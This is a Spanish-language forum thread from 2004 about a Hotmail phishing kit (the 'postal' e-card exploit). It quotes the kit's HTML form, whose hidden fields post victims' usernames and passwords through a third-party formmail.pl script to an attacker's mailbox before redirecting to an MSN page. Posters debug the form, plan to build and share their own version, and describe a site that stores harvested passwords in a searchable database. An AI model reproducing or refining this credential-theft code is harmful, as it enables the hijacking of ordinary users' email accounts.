INFORMATICA Y OCIO

eTitons · Invitado

Como alguien dijo en otro post, algunos q empezamos preguntan/preguntamos cosas sin querer aprender y eso no esta bien.

Espero q esta pregunta no moleste a nadie pues estoy intentando aprender y no usar por usar

Ok, ahi va:

<INPUT type=hidden value=http://www.t1msn.com.mx name=redirect>

alguien me dice q es esa linea? ya se que es un parametro oculto que se mandara junto con el formulario de nombre:redirect y Valor:http://www.t1msn.com.mx pero... cual es su función???

Gracias desde ya!!!

ExTeRnAl · Publicado: Dom Oct 17, 2004 2:16 am **Título del mensaje**:

este los exploits son mails que nos llegan modificados con el agregado de mail y password, eso manda a la page de msn de mexico y dentro algun verso para poner el user y pass

De seguro es el exploit de Aumenta tu cuenta o de validacionde cuenta

Salu2
_________________

eTitons · Invitado

External, lo que es un exploit lo tengo muy claro ya. Pero si no me equivoco y con lo que he aprendido, el exploit se manda a un cgi, y en el caso del exploit de la postal este cgi es el de interdominios, ya que es el que se especifica en FORM-> ACTION

Por eso no entiendo esa otra dirección, la mexico, para que vale ya que se supone que desde el cgi de interdominios se mandaria a la cuenta de correo "akitumail@tumail.es" no?

que es esa otra htp://64.4.52.7 ?

form method="post" action=http://cgi.interdominios.com/formmail.pl>
<input type="hidden" name="recipient" value="akitumail@tumail.es">
<input type="hidden" name="redirect" value="http://64.4.52.7" ">

necesito aclarar esas dos dudas por favorrrrrrrrrrr

Gracias desde ya

eTitons · Invitado

Bueno amigo, segun aprendo me resuelvo dudas y si alguien esta siguiendo este hilo, pues me las respondere publicamente por si alguien pretende aprender y no solo usmear...

El exploit de la postal no esta correcto del todo de ahi venian mis dudas.
Para empezar:

1.- el valor redirect es la pagina q mostrara al usuario una vez mandado el formulario, ok?
2.- si nos fijamos en el xploit de la postal, se repite codigo, fijense:

<INPUT type=hidden value=akitumail name=recipient>
<INPUT type=hidden value=Contraseñas hotmail name=subject>
<INPUT type=hidden value=http://www.t1msn.com.mx name=redirect>

<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse; border-width: 0" bordercolor="#111111" width="314" id="AutoNumber1">
<tr>
<td width="93" style="border-style: none; border-width: medium"> </td>
</tr>
</table>
<strong><font class="f" size="2">
</strong>

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
<tr>
<td width="100%"> <table cellspacing=0 cellpadding=0 width=30 border=0 height="1" style="border-collapse: collapse" bordercolor="#111111">
<tr>
<td valign=top width="623" height="1">
<table class=text cellspacing=0 cellpadding=4 width="330" border=0 height="118">
<tr>
<td valign=top width="139" height="1">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; " bordercolor="#111111" width="409" id="AutoNumber1">
<tr>
<td width="177">

<form method="post" action=http://cgi.interdominios.com/formmail.pl>
<input type="hidden" name="recipient" value="akitumail">
<input type="hidden" name="redirect" value="http://64.4.52.7" >

como podemos observar la variable redirect se escribe dos veces con distintos valores.

Vamos progresando poko a poko no?

Gracias a todos y especialmente
a external y hackimail

Solo me falta algun buen script en la web para mandar el xploit q yo mismo construire y pondre a disposicion de todos...
para q me lo critiquen...jejejeje

eTitons · Invitado

perdon, olvide comentar aunque es de cajon de madera de pino que las 3 primeras INPUT se pueden borrar, ya q no sirven para nada pues despues se sobreescriben....(la de subject no se sobreescribe)

Corrijanme si me equivoco...

ExTeRnAl · Publicado: Dom Oct 17, 2004 9:53 am **Título del mensaje**:

Mira es un exploit bastante variado y robado dicho sea de paso... Razz

un tal victor-sb dice ser suyoy lo robo de hackerss.com bueno ya el caso es que agrego un IMPUT este llega a tu mail, pero a la vez le llega a la db de hackerss.com jeje XDDD eso es por Victor-Sb lammo ed damier

Salu2
_________________

eTitons · Invitado

OK, de acuerdo, pero quisiera saber si las conclusiones y correcciones q hice yo estan bien hechas y de paso agradeceria poder investigar y poder descubrir cual es el codigo que hace q el xploit tambien llegue a hackers...

me ayudas? no veo nada de nada

Gracias desde ya!!

ExTeRnAl · Publicado: Lun Oct 18, 2004 1:07 am **Título del mensaje**:

Si no tas errado en casi todo lo que dijste
y esa linea perfectamente se puede borrar o no eso es cuestion de probarla

Salu2
_________________

eTitons · Invitado

Quien te dijo q tambien se mandaba algo a la bd de hackerss, victor???
pues yo creo q mintio y sino q me demuestre la linea de codigo
que programa esa accion. no existe.
si alguien no esta de acuerdo que responda!!
gracias desde ya

ExTeRnAl · Publicado: Lun Oct 18, 2004 1:16 am **Título del mensaje**:

Mira el caso es que maxx admin de hackerss.com configuro los exploits de esta manera muestra una imagen en miniatura y le pones el mail de la victima y se envia
este cuando se rellena manda el pass a una db de hackerss la cual desde la misma page puedes poner buscar y estara el pass
hackerss.com/hotmail/

y solo le agregaron la linea para que llegue al correo y este victor dice que el epzloit lo hizo el

Salu2
_________________

	Índice del Foro Foroz comunity :: (Msn) Todo Sobre Messenger	Todas las horas están en GMT + 1 Hora Ir a página 1, 2 Siguiente
Página 1 de 2